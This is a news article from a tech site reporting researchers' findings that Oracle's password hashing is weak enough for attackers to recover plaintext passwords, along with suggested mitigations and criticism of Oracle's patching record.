Follow Us

We use cookies to provide you with a better experience. If you continue to use this site, we'll assume you're happy with this. Alternatively, click here to find out how to manage these cookies

hide cookie message

Oracle security undermined yet again

Researchers add to glut of concerns.

Article comments

Oracle's security practices have come under a fresh attack from two security researchers who claim the database maker's products have serious password-protection weaknesses.

Joshua Wright of the SANS Institute and Dr Carlos Cid of the Information Security Group at the Royal Holloway, University of London, have published a paper outlining problems with Oracle's password system that they say make it "straightforward" to recover users' passwords. Wright gave a presentation on the matter at the SANS Network Security conference in Los Angeles earlier this week, SANS said.

The problem centres on the hashing algorithm Oracle uses to protect passwords, which the researchers said is "weak" and subject to several attacks. If an attacker were able to gain password hash information from a compromised system, the weakness could allow access to password-protected information, said Cid and Wright.

Possible ways of exploiting the weakness include traffic sniffing or SQL injection, they said.

"The current mechanism presents a number of weaknesses, making it straightforward for an attacker with limited resources to recover a user's plaintext password from the hashed value," Cid and Wright wrote in the paper. Even strong passwords could be vulnerable to this type of attack, they said.

Password recovery wouldn't need complex or even custom-made software, but could be carried out with simple, off-the-shelf components, they said. "By exploiting these weaknesses, an adversary with limited resources can mount an attack that would reveal the plaintext password from the password hash for a known user," Cid and Wright wrote.

One way of limiting danger from the problem at the moment would be to enforce a strong password policy among users, and to ensure users have access to the minimum of privileged resources, the paper said. Administrators could also put other protections into place, such as encrypting TNS traffic, the researchers said.

A better solution, though, would be for Oracle to improve its password management system, they said. The SANS Institute said it contacted Oracle about the problems in mid-July, but said Oracle hasn't responded on when it plans to take any action. SANS urged users to speak to Oracle themselves.

Oracle has come under increasing pressure over its security practices this year. The company has repeatedly issued critical security patches that don't work - its October patches didn't fix all the problems they were supposed to address, and in July, Oracle released two sets of database patches to fix flaws in previously released security patches. One of the affected fixes in July was itself a fix to an earlier set of patches - in other words, a patch for a patch for a patch.

Earlier this year a German security firm released details of several high-risk Oracle flaws, along with workarounds, claiming to have seen no action from Oracle two years after reporting the bugs. The firm said the delay was more evidence that Oracle's patching system is in disarray.

Oracle has said it stands behind the security of its products and takes security seriously.


More from Techworld

More relevant IT news


Send to a friend

Email this article to a friend or colleague:

PLEASE NOTE: Your name is used only to let the recipient know who sent the story, and in case of transmission error. Both your name and the recipient's name and address will not be used for any other purpose.

Techworld White Papers

Choose – and Choose Wisely – the Right MSP for Your SMB

End users need a technology partner that provides transparency, enables productivity, delivers...

Download Whitepaper

10 Effective Habits of Indispensable IT Departments

It’s no secret that responsibilities are growing while budgets continue to shrink. Download this...

Download Whitepaper

Gartner Magic Quadrant for Enterprise Information Archiving

Enterprise information archiving is contributing to organisational needs for e-discovery and...

Download Whitepaper

Advancing the state of virtualised backups

Dell Software’s vRanger is a veteran of the virtualisation specific backup market. It was the...

Download Whitepaper

Techworld UK - Technology - Business

Innovation, productivity, agility and profit

Watch this on demand webinar which explores IT innovation, managed print services and business agility.

Techworld Mobile Site

Access Techworld's content on the move

Get the latest news, product reviews and downloads on your mobile device with Techworld's mobile site.

Find out more...

From Wow to How : Making mobile and cloud work for you

On demand Biztech Briefing - Learn how to effectively deliver mobile work styles and cloud services together.

Watch now...

Site Map

* *